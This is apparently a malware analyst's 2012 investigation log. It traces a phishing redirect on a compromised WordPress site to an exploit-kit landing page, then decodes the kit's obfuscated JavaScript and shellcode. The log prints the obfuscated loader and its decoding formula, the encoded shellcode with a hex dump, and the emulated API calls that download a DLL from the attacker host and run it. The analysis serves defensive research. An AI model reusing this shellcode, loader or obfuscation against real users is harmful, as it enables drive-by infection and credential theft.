# MalwareMustDie - PluginDetect Decoding Guide
# for the Trojan parfeit Investigation
# (Credential Stealer Case)
------------

--18:06:57--  h00p://www.irwra.com/wp-content/themes/mantra/uploads/cpa_inform.htm
           => `cpa_inform.htm'
Resolving www.irwra.com... 50.116.98.44
Connecting to www.irwra.com|50.116.98.44|:80... connected.
HTTP request sent, awaiting response... HTTP/1.1 200 OK

// real time with Xurl..

@unixfreaxjp /malware]$ Xurl h00p://www.irwra.com/wp-content/themes/mantra/uploads/cpa_inform.html |jless
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100   813  100   813    0     0   1187      0 --:--:-- --:--:-- --:--:--  4567
<html>
<head>
<title>Processing request... Banking, Credit Cards, Lending & Investing - CPA</title>

<script type="text/javascript">
<!--
location.replace("h00p://latticesoft.net/detects/continues-little.php");
//-->
</script>
<noscript>
<meta http-equiv="refresh" content="0; url=h00p://latticesoft.net/detects/continues-little.php">
</noscript>

</head>

<h1>You will be redirected to details of purchase</h1>


<h4 style="color:#364dbc;">We must complete few security checks to show your transfer details:</h4>

<h3>Be sure you have a transfer reference ID.<br />You will be asked to enter it after we check the link.<br><br>Important: Please be advised that calls to and from your wire service team may be monitored or recorded.<br /></h3>

<h3>Redirecting to Survey details... Please wait...</h3>



</html>

------------------------------------------------

--2012-12-22 03:44:27--  h00p://latticesoft.net/detects/continues-little.php
Resolving latticesoft.net (latticesoft.net)... 59.57.247.185
Caching latticesoft.net => 59.57.247.185
Connecting to latticesoft.net (latticesoft.net)|59.57.247.185|:80... connected.

---request begin---
GET /detects/continues-little.php HTTP/1.1
Referer: http://www.irwra.com//wp-content/themes/mantra/uploads/cpa_inform.html
User-Agent: #MalwareMustDie!
Accept: */*
Host: latticesoft.net
Connection: Keep-Alive
HTTP request sent, awaiting response...

---response begin---
HTTP/1.1 200 OK
Server: nginx/1.3.3
Date: Fri, 21 Dec 2012 18:44:29 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
X-Powered-By: PHP/5.3.14
200 OK
Length: unspecified [text/html]
Saving to: `continues-little.php'
2012-12-22 03:44:33 (28.7 KB/s) - `continues-little.php' saved [95903]

--------------------------------------------------------

TRY TWO:

--14:18:07--  h00p://latticesoft.net/detects/continues-little.php
           => `continues-little.php.1'
Resolving latticesoft.net... seconds 0.00, 59.57.247.185
Caching latticesoft.net => 59.57.247.185
Connecting to latticesoft.net|59.57.247.185|:80... seconds 0.00, connected.
Created socket 1896.
Releasing 0x003d5348 (new refcount 1).
---request begin---
GET /detects/continues-little.php HTTP/1.0
Referer: h00p://www.irwra.com//wp-content/themes/mantra/uploads/cpa_inform.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6)
Accept: */*
Host: latticesoft.net
Connection: Keep-Alive

---request end---
HTTP request sent, awaiting response...
---response begin---
HTTP/1.1 200 OK
Server: nginx/1.3.3
Date: Sat, 22 Dec 2012 05:17:56 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.3.14

---response end---
200 OK
Length: unspecified [text/html]
14:18:13 (25.29 KB/s) - `continues-little.php.1' saved [91337]  <=============== the size changes....


---------------
// CHANGES!!!!!! WHy? What?
// what had changed??
// let's use unix's diff command to diff the previous code w/new one and see what's changes the moronz did:

0x001c1

< <html><head><title></title></head><body>
<applet archive="/detects/continues-little.php?zasyymcc=vwg&ncnjr=qjx" code="&#00104;&#00119;">
<param value="Dyy3Ojj-Vyy8%eit.ywoeyjMeye%yi" name="&#00118;&#0097;&#00108;"/>
<param value="j%toy8oKeim-8yy-ew3D3xe.b1fO6oO68O68O11R8eb6oOh_O68O6CO6tO68O6AOhvO60O60RMb6.RC3bvRl?bS" name="&#00112;&#00114;&#00105;&#00109;&#00101;" />
</applet><div></div><script>dd="i";pp="e"+"In";asd=function(){for(i=0;;i++){


0x007c7

< <script>a.setAttribute("z5","-2f666eb-46996eb-671g4fc-6bkg4
2e5907a-8h8h8dg-671dmf3-3e5dgf9-1g7ff66-4698heh-3e866e8-871eh
6696969-0h88hfl-4e5g4g7-7flf955-5djh8h8-56iebe5-3g4c6e5-4flg1
3f98heh-1e866e8-171ebe5-6g4c6e5-9flg1eh-3fcf99l-0fcf9e5-15890
271g1ff-1f3ehg4-0b5g7f6-7bhe5eb-9gg6idg-671ebe5-2g4c6e5-1flg1
7e56669-2h8h86i-2dge2e2-6c9ehf9-6a1gae5-2f9g48e-9e8g7f9-9dmg4
7g4dgdm-2eea1ga-0e5f9g4-2665bfc-3f95b6f-8e26idm-269h8e5-4f3g1
8e8g7f9-7dmg177-68ecld4-96ic9am-2e8g7f9-8dmg18e-8cld46i-3flg7
-8e5f9g4-26idg90-6e271eb-7e5g4a1-3f3e5f6-1e5f9g4-0g19fgj-9c0d
-5e5f9g4-1g19fgj-9c0dgeb-8b5dgf6-3e5665b-0djfce2-2gj5b69-6cl7
-16iff6i-0fc90f6-171dmfl-1e5dgg4-1e5a1f3-4e5f6e5-6f9g466-85bg
-7f9e56l-2g1g4gj-7f3e58e-6f9fcf9-5e58hdj-5fcfle2-5e5fl6l-8g1g
-8dgg1e5-4666971-0fle5ff-7f3dgdm-0e56674-6d1g174-4eb6i5b-45b6

0x018c18

< 	if(a["su"+"bstr"](i,1)=="-")i+=2;
---
> 	if(a["substr"](i,1)=="-")i+=2;

// yep, the moronz was changing the jar applet infector (0x001c1) &
// it changed the obfuscation code (0x007c7) and also -
// making more scattered strings for the obfs generator code (0x018c18)

// These three changes suggested the payload has changed.
// Nevermind with the old payload so we get into the new one!

--------------------------------------------------------

// See the latest code...

// let's strip the garbage html code & make it more viewable..
// then see which are th epart of obfuscation & its sturcture, 
// and recognize where's obfuscated data feed code & decoding generator code.

// After that go to the obfuscation part and undersatnding the structure < important!
// In this case those malware moronz is splitting obfuscation code within a.setAttribute()
// arrays using scripts tags, just adjust them by deleting all <script></script>
// tags and you're good to go.

// So, the structure of the current obfuscated structure is:

a.setAttribute("z0","-[0-9|a-z]...-[0-9|a-z]");
                z0+1
                :
                z29

// And this is the code to feed obfuscated data...

dd="i";
pp="e"+"In";

asd=function()
   {
   for(i=0;;i++)
       {
       r=a.getAttribute("z"+i);if(r){s=s+r;}else break;
       }};
a=document.createElement(dd);


// Thus, this is the generator part to crack the code;

document.body.appendChild(a);
 if(document.getElementsByTagName("d"+"iv")[0].style.left==="")
 {
   ss=String.fromCharCode;
   a=document["getElementsB"+"yTagName"](dd);
   a=a[0];
   s=new String();
   asd();
   a=s;
   s=new String();
   e=window["eva"+"l"];
   p=parseInt;
   for(i=0;a.length>i;i+=2)
   {
     if(a["su"+"bstr"](i,1)=="-")i+=2;
     s=s+(ss((p(a["substr"](i,2),23)-24)/3));
   }
   try
   {
     document.body*=document;
   }
   catch(asfas)
   {
     e("if(1)"+s);
   }
 }


// And this is the logic formula to crack :

   // here's the formula...
   for(i=0;a.length>i;i+=2)
   {
     if(a["substr"](i,1)=="-")i+=2;
     s=s+(ss((p(a["substr"](i,2),23)-24)/3));
   }


// You can manipulate the decoding operation easlizy by making
// array of a element and feed the array 0 to 29 with 
// the garbled code one by one and just feed it into the 
// formula.


//And the result is the NEW PLUGINDETECT OBFS code (v 0.7.9)

 var PluginDetect =
 {
   version : "0.7.9", name : "PluginDetect", handler : function (c, b, a)
   {
     return function ()
     {
       c(b, a)
     }
   }
   , openTag : "<", isDefined : function (b)
   {
     return typeof b != "undefined"
   }
   , isArray : function (b)
   {
     return (/array/i).test(Object.prototype.toString.call(b))
        :
        :(blah! etc)

//let's modify shellcode to grab the payload:

var a = "8282!%51c4!%04e4!%25e0!%f551!%e014!%9134!%4451!%54e0!%2191!%9154!%e521!%21a1!%91f4!%1421!%2191!%9174!%2421!%2191!%9114!%f521!%21a1!%9164!%d451!%e0f4!%b181!%2421!%2191!%91e4!%e521!%21a1!%b181!%e451!%7125!%0485!%6085!%44d4!%c5c5!%4414!%b550!%d5d4!%1464!%64c5!%b474!%b570!%b4c5!%c5d4!%c4d4!%c570!%64d4!%c560!%74e4!%d4b5!%14b4!%c5c5!%4494!%7070!%8521!%c5c5!%8504!%2370!%15e1!%eee6!%3733!%2e2a!%59b1!%7492!%621a!%6d2a!%4c0b!%6662!%7d6a!%6d7d!%0c4b!%e702!%6d7d!%8224!%ce24!%82d5!%8a71!%2df6!%82d5!%8a71!%b3f6!%a23c!%423c!%babe!%e7c2!%b77d!%3c42!%82ba!%c224!%7de7!%82b7!%e324!%8ed5!%c3da!%7de7!%2482!%b7f7!%2482!%2482!%9697!%53c2!%0ac6!%c281!%2a9e!%8217!%5312!%eec6!%4444!%60c4!%53d2!%fec6!%a4c5!%f585!%5382!%fec6!%1e97!%0cb1!%423a!%7de7!%8282!%0d82!%b704!%b580!%8050!%c002!%fec6!%b1a1!%e5a5!%c0c2!%fec6!%f4b5!%a5d4!%c2c0!%42fe!%47c0!%825a!%9282!%4cc2!%a59a!%a23c!%7d3c!%7d7d!%0c94!%3a0c!%ce02!%e3ba!%c77d!%4454!%d5a5!%8204!%6482!%0474!%7dbc!%bed2!%83ba!%3a67!%3a4c!%87d7!%8e13!%87ba!%8282!%7d82!%8604!%8724!%8207!%8282!%0c82!%ac1d!%7d7d!%0b7d!%170c!%24d2!%3afd!%0402!%bd3a!%eb3c!%c5b2!%42b1!%8a55!%0480!%583a!%3cb7!%17be!%3867!%b2de!%c23a!%5f3a!%0fb2!%423a!%c7c0!%4c7d!%5ae6!%4236!%e43a!%b25f!%67c0!%673a!%d5ec!%3173!%3c9d!%2f86!%52b2!%9e3e!%c502!%01ad!%6983!%3f72!%deb1!%58b2!%964d!%1e16!%ddb1!%80b2!%3ae5!%dde7!%05b2!%c5d1!%413a!%3ad5!%97e7!%3c46!%971c!%ccd5!%c0da!%fac1!%d53d!%11e2!%bee6!%8681!%093a!%7d7d!%d383!%9a6c!%b140!%b2c5!%6741!%e43a!%b13f!%e502!%e73a!%8543!%423a!%3a86!%8681!%c43a!%b18e!%1c77!%d5c1!%dacc!%ffff!%beff!%508e!%afbe!%042e!%0382!%ef08!%9e80!%6618!%139c!%0185!%cfbe!%4ecf!%6638!%1414!%1414!%".split("").reverse().join("");
var x=a["replace"](/\%!/g, "%" + "u");
document.write(x);

 ↓↓
 
%u4141%u4141%u8366%ufce4%uebfc%u5810%uc931%u8166%u08e9%u80fe%u2830%ue240%uebfa%ue805%uffeb%uffff%uccad%u1c5d%u77c1%ue81b%ua34c%u1868%u68a3%ua324%u3458%ua37e%u205e%uf31b%ua34e%u1476%u5c2b%u041b%uc6a9%u383d%ud7d7%ua390%u1868%u6eeb%u2e11%ud35d%u1caf%uad0c%u5dcc%uc179%u64c3%u7e79%u5da3%ua314%u1d5c%u2b50%u7edd%u5ea3%u2b08%u1bdd%u61e1%ud469%u2b85%u1bed%u27f3%u3896%uda10%u205c%ue3e9%u2b25%u68f2%ud9c3%u3713%uce5d%ua376%u0c76%uf52b%ua34e%u6324%u6ea5%ud7c4%u0c7c%ua324%u2bf0%ua3f5%ua32c%ued2b%u7683%ueb71%u7bc3%ua385%u0840%u55a8%u1b24%u2b5c%uc3be%ua3db%u2040%udfa3%u2d42%uc071%ud7b0%ud7d7%ud1ca%u28c0%u2828%u7028%u4278%u4068%u28d7%u2828%uab78%u31e8%u7d78%uc4a3%u76a3%uab38%u2deb%ucbd7%u4740%u2846%u4028%u5a5d%u4544%ud77c%uab3e%u20ec%uc0a3%u49c0%ud7d7%uc3d7%uc32a%ua95a%u2cc4%u2829%ua528%u0c74%uef24%u0c2c%u4d5a%u5b4f%u6cef%u2c0c%u5a5e%u1a1b%u6cef%u200c%u0508%u085b%u407b%u28d0%u2828%u7ed7%ua324%u1bc0%u79e1%u6cef%u2835%u585f%u5c4a%u6cef%u2d35%u4c06%u4444%u6cee%u2135%u7128%ue9a2%u182c%u6ca0%u2c35%u7969%u2842%u2842%u7f7b%u2842%u7ed7%uad3c%u5de8%u423e%u7b28%u7ed7%u422c%uab28%u24c3%ud77b%u2c7e%uebab%uc324%uc32a%u6f3b%u17a8%u5d28%u6fd2%u17a8%u5d28%u42ec%u4228%ud7d6%u207e%ub4c0%ud7d6%ua6d7%u2666%ub0c4%ua2d6%ua126%u2947%u1b95%ua2e2%u3373%u6eee%u1e51%u0732%u4058%u5c5c%u1258%u0707%u4944%u5c5c%u4b41%u5b4d%u4e47%u065c%u4d46%u075c%u4d4c%u4d5c%u5c4b%u075b%u474b%u5c46%u4641%u4d5d%u055b%u4144%u5c5c%u4d44%u5806%u5840%u5217%u154e%u181b%u1a12%u125e%u4e19%u1912%u1242%u181b%u4f0e%u154d%u4619%u1a12%u125f%u4119%u1912%u1242%u4719%u1912%u1241%u4f19%u1a12%u125e%u4519%u1912%u0e45%u1544%u4319%u410e%u155f%u0e52%u4e40%u4c15%u2828


// here's the shellcode (in bin & text)....

41 41 41 41 66 83 e4 fc  fc eb 10 58 31 c9 66 81   AAAAf......X1.f.
e9 08 fe 80 30 28 40 e2  fa eb 05 e8 eb ff ff ff   ....0(@.........
ad cc 5d 1c c1 77 1b e8  4c a3 68 18 a3 68 24 a3   ..]..w..L.h..h$.
58 34 7e a3 5e 20 1b f3  4e a3 76 14 2b 5c 1b 04   X4~.^...N.v.+\..
a9 c6 3d 38 d7 d7 90 a3  68 18 eb 6e 11 2e 5d d3   ..=8....h..n..].
af 1c 0c ad cc 5d 79 c1  c3 64 79 7e a3 5d 14 a3   .....]y..dy~.]..
5c 1d 50 2b dd 7e a3 5e  08 2b dd 1b e1 61 69 d4   \.P+.~.^.+...ai.
85 2b ed 1b f3 27 96 38  10 da 5c 20 e9 e3 25 2b   .+...'.8..\...%+
f2 68 c3 d9 13 37 5d ce  76 a3 76 0c 2b f5 4e a3   .h...7].v.v.+.N.
24 63 a5 6e c4 d7 7c 0c  24 a3 f0 2b f5 a3 2c a3   $c.n..|.$..+..,.
2b ed 83 76 71 eb c3 7b  85 a3 40 08 a8 55 24 1b   +..vq..{..@..U$.
5c 2b be c3 db a3 40 20  a3 df 42 2d 71 c0 b0 d7   \+....@...B-q...
d7 d7 ca d1 c0 28 28 28  28 70 78 42 68 40 d7 28   .....((((pxBh@.(
28 28 78 ab e8 31 78 7d  a3 c4 a3 76 38 ab eb 2d   ((x..1x}...v8..-
d7 cb 40 47 46 28 28 40  5d 5a 44 45 7c d7 3e ab   ..@GF((@]ZDE|.>.
ec 20 a3 c0 c0 49 d7 d7  d7 c3 2a c3 5a a9 c4 2c   .....I....*.Z..,
29 28 28 a5 74 0c 24 ef  2c 0c 5a 4d 4f 5b ef 6c   )((.t.$.,.ZMO[.l
0c 2c 5e 5a 1b 1a ef 6c  0c 20 08 05 5b 08 7b 40   .,^Z...l....[.{@
d0 28 28 28 d7 7e 24 a3  c0 1b e1 79 ef 6c 35 28   .(((.~$....y.l5(
5f 58 4a 5c ef 6c 35 2d  06 4c 44 44 ee 6c 35 21   _XJ\.l5-.LDD.l5!
28 71 a2 e9 2c 18 a0 6c  35 2c 69 79 42 28 42 28   (q..,..l5,iyB(B(
7b 7f 42 28 d7 7e 3c ad  e8 5d 3e 42 28 7b d7 7e   {.B(.~<..]>B({.~
2c 42 28 ab c3 24 7b d7  7e 2c ab eb 24 c3 2a c3   ,B(..${.~,..$.*.
3b 6f a8 17 28 5d d2 6f  a8 17 28 5d ec 42 28 42   ;o..(].o..(].B(B
d6 d7 7e 20 c0 b4 d6 d7  d7 a6 66 26 c4 b0 d6 a2   ..~.......f&....
26 a1 47 29 95 1b e2 a2  73 33 ee 6e 51 1e 32 07   &.G)....s3.nQ.2.
58 40 5c 5c 58 12 07 07  44 49 5c 5c 41 4b 4d 5b   X@\\X...DI\\AKM[
47 4e 5c 06 46 4d 5c 07  4c 4d 5c 4d 4b 5c 5b 07   GN\.FM\.LM\MK\[.
4b 47 46 5c 41 46 5d 4d  5b 05 44 41 5c 5c 44 4d   KGF\AF]M[.DA\\DM
06 58 40 58 17 52 4e 15  1b 18 12 1a 5e 12 19 4e   .X@X.RN.....^..N
12 19 42 12 1b 18 0e 4f  4d 15 19 46 12 1a 5f 12   ..B....OM..F.._.
19 41 12 19 42 12 19 47  12 19 41 12 19 4f 12 1a   .A..B..G..A..O..
5e 12 19 45 12 19 45 0e  44 15 19 43 0e 41 5f 15   ^..E..E.D..C.A_.
52 0e 40 4e 15 4c 28 28                            R.@N.L((        

// And the translation of the API.....

0x7c801ad9 kernel32.VirtualProtect(lpAddress=0x4020cf, dwSize=255)
0x7c801d7b kernel32.LoadLibraryA(lpFileName=urlmon)
0x7c835dfa kernel32.GetTempPathA(lpBuffer=0x22fc60, nBufferLength=248, [lpBuffer=C:\DOCUME~1\Administrator\LOCALS~1\Temp\])
0x1a494bbe urlmon.URLDownloadToFileA(pCaller=0, szURL=http://latticesoft.net/detects/continues-little.php?zf=30:2v:1f:1j:30&ge=1n:2w:1i:1j:1o:1i:1g:2v:1m:1m&l=1k&iw=z&hf=d , lpfnCB=0x0, szFileName=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll)
0x7c86250d kernel32.WinExec(lpCmdLine=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll, uCmdShow=0)
0x7c86250d kernel32.WinExec(lpCmdLine=regsvr32 -s C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll, uCmdShow=0)	
0x7c81cb3b kernel32.TerminateThread(dwExitCode=0)

----
#MalwareMustDie!
unixfreaxjp /malware]$ date
Sat Dec 22 18:59:02 JST 2012